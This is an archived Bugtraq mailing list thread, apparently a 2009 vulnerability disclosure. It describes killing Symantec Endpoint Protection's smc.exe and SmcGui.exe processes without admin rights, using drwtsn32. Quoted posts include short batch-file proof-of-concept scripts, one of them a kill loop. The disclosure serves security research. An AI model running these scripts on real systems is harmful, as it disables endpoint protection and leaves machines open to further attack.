Bugtraq mailing list archives
RE: SEPKILL /im SMC.EXE /f
From: David Calabro <dcalabro () transitionalwork org>
Date: Fri, 13 Feb 2009 14:32:24 -0500
If the Symantec Management Client service was somehow changed from "smc.exe" to "smc.exe -P" it would effectively prevent the service from starting in the first place. Correct? -----Original Message----- From: Sandeep Cheema [mailto:51l3n7 () live in] Sent: Friday, February 13, 2009 12:25 PM To: bugtraq () securityfocus com Subject: Re: SEPKILL /im SMC.EXE /f Just as an update couldn't get any further other than t.he fact that SMCGui.exe is getting killed as its running in the user account and SMC.exe in the system account. Thank you. Regards, Sandeep -------------------------------------------------- From: "Sandeep Cheema" <51l3n7 () live in> Sent: Friday, February 13, 2009 8:06 PM To: <bugtraq () securityfocus com> Subject: Re: SEPKILL /im SMC.EXE /f
For the "users" its working for SmcGUI.exe Please find the code as below. :here tasklist | find /i "SmcGui.exe" > c:\pid.txt FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R drwtsn32 -p %pidopt% goto :here I have tried it and when let this file run for around 2 mins, The SmcGui.exe process loads up when you logoff and log back in (or restart)but the icon does not show up in the taskbar. Thank you. Regards, Sandeep -------------------------------------------------- From: "Sandeep Cheema" <51l3n7 () live in> Sent: Friday, February 13, 2009 7:03 PM To: <bugtraq () securityfocus com> Subject: Re: SEPKILL /im SMC.EXE /fAs an update its not happening for "Users" account, Though no access denied. Anyone knows why? Thank you. Regards, Sandeep -------------------------------------------------- From: "Sandeep Cheema" <51l3n7 () live in> Sent: Friday, February 13, 2009 6:18 PM To: <bugtraq () securityfocus com> Subject: SEPKILL /im SMC.EXE /fHi, Probably this bug exists on majorly all the software's but security software's like antivirus and firewall have to bucket it which is not what its for SEP. I have tested it on all versions of SEP from 11.0.776 to 11.0.4000(XP and 2k3) You can kill smc.exe with the help of drwtsn32.exe in the following way. drwtsn32 -p %pid% where pid is the process id for smc.exe POC: Save the following as a batch file and execute it tasklist | find /i "Smc.exe" > c:\pid.txt FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R drwtsn32 -p %pidopt% You don't need admin privilege for this exploit. This will even bypass the password if it has been set to stop the service. If executed from the command line in the form drwtsn32 -p %pid% , the command will be executed and it takes some time for the process to be stopped. If done from a batch file the command is completed only when the process is stopped. Regards, Sandeep 51l3n7[at]live.in
<<attachment: winmail.dat>>
Current thread:
- SEPKILL /im SMC.EXE /f Sandeep Cheema (Feb 13)
- <Possible follow-ups>
- Re: SEPKILL /im SMC.EXE /f Sandeep Cheema (Feb 13)
- Re: SEPKILL /im SMC.EXE /f Sandeep Cheema (Feb 13)
- Re: SEPKILL /im SMC.EXE /f Sandeep Cheema (Feb 13)
- RE: SEPKILL /im SMC.EXE /f David Calabro (Feb 13)
- Re: SEPKILL /im SMC.EXE /f Sandeep Cheema (Feb 13)
- RE: SEPKILL /im SMC.EXE /f David Calabro (Feb 13)
- Re: SEPKILL /im SMC.EXE /f Sandeep Cheema (Feb 19)
- Re: SEPKILL /im SMC.EXE /f Sandeep Cheema (Feb 20)
- Re: SEPKILL /im SMC.EXE /f Sandeep Cheema (Feb 20)